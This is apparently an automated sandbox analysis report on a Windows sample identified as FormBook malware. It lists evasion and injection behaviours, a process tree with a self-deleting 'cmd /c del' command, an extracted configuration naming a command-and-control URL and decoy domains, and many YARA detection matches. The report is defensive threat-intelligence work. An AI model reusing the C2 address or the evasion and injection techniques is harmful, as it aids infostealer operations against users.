Play interactive tour

Edit tour

Windows Analysis Report 1D4l9eR0W4

Overview

General Information

Sample Name:	1D4l9eR0W4 (renamed file extension from none to exe)
Analysis ID:	532910
MD5:	192b796d92d190c45204571599c38c86
SHA1:	611559df5b74934dea4c81a5490e2c64a73ee6e0
SHA256:	23c8bfea897f9833766ceab96299a77ad19ed1e0897b7e30d56d2c56c30d2d4e
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Self deletion via cmd delete

.NET source code contains potential unpacker

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

1D4l9eR0W4.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\1D4l9eR0W4.exe" MD5: 192B796D92D190C45204571599C38C86)

1D4l9eR0W4.exe (PID: 5548 cmdline: C:\Users\user\Desktop\1D4l9eR0W4.exe MD5: 192B796D92D190C45204571599C38C86)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wlanext.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)

cmd.exe (PID: 5676 cmdline: /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.scion-go-getter.com/mwev/"], "decoy": ["9linefarms.com", "meadow-spring.com", "texascountrycharts.com", "chinatowndeliver.com", "grindsword.com", "thegurusigavebirthto.com", "rip-online.com", "lm-safe-keepingtoyof6.xyz", "plumbtechconsulting.com", "jgoerlach.com", "inbloomsolutions.com", "foxandmew.com", "tikomobile.store", "waybunch.com", "thepatriottutor.com", "qask.top", "pharmacylinked.com", "ishii-miona.com", "sugarandrocks.com", "anabolenpower.net", "my9m.com", "ywboxiong.xyz", "primetire.net", "yshxdys.com", "royallecleaning.com", "xtrategit.com", "almashrabia.net", "bundlezandco.com", "sandman.network", "vinhomes-grand-park.com", "jbarecipes.com", "squareleatherbox.net", "breathechurch.digital", "wodemcil.com", "carthy.foundation", "galimfish.com", "reflectbag.com", "lheteclase.quest", "yourvirtualevent.services", "custercountycritique.com", "liyahgadgets.com", "sweetascaramelllc.com", "lzgirlz.com", "flydubaime.com", "aanhanger-verhuur.com", "schooldiry.com", "theroadtorodriguez.com", "mrteez.club", "gxystgs.com", "runz.online", "kometbux.com", "mintyhelper.com", "bestinvest-4u.com", "bjxxc.com", "e-readertnpasumo5.xyz", "experimentwithoutlimits.com", "21yingyang.com", "recbi56ni.com", "tabulose-milfs-live.com", "uglyatoz.com", "websitessample.com", "gogopficg.xyz", "fourthandwhiteoak.com", "fulvousemollientplanet.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.665105654.000000000333D000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x52f48:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x532e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2d7058:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2d73f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2ffe78:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x300212:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x5eff5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2e3105:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x30bf25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5eae1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2e2bf1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x30ba11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x5f0f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2e3207:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x30c027:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x5f26f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2e337f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x30c19f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x53cfa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2d7e0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x300c2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x61419:$sqlite3step: 68 34 1C 7B E1 0x6152c:$sqlite3step: 68 34 1C 7B E1 0x2e5529:$sqlite3step: 68 34 1C 7B E1 0x2e563c:$sqlite3step: 68 34 1C 7B E1 0x30e349:$sqlite3step: 68 34 1C 7B E1 0x30e45c:$sqlite3step: 68 34 1C 7B E1 0x61448:$sqlite3text: 68 38 2A 90 C5 0x6156d:$sqlite3text: 68 38 2A 90 C5 0x2e5558:$sqlite3text: 68 38 2A 90 C5 0x2e567d:$sqlite3text: 68 38 2A 90 C5 0x30e378:$sqlite3text: 68 38 2A 90 C5 0x30e49d:$sqlite3text: 68 38 2A 90 C5 0x6145b:$sqlite3blob: 68 53 D8 7F 8C 0x61583:$sqlite3blob: 68 53 D8 7F 8C 0x2e556b:$sqlite3blob: 68 53 D8 7F 8C 0x2e5693:$sqlite3blob: 68 53 D8 7F 8C 0x30e38b:$sqlite3blob: 68 53 D8 7F 8C 0x30e4b3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 1D4l9eR0W4.exe PID: 1476	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.1D4l9eR0W4.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.1D4l9eR0W4.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.1D4l9eR0W4.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
3.0.1D4l9eR0W4.exe.400000.8.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.1D4l9eR0W4.exe.400000.8.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.1D4l9eR0W4.exe.400000.8.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
3.0.1D4l9eR0W4.exe.400000.8.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.1D4l9eR0W4.exe.400000.8.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.1D4l9eR0W4.exe.400000.8.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
3.0.1D4l9eR0W4.exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.1D4l9eR0W4.exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.1D4l9eR0W4.exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
3.0.1D4l9eR0W4.exe.400000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
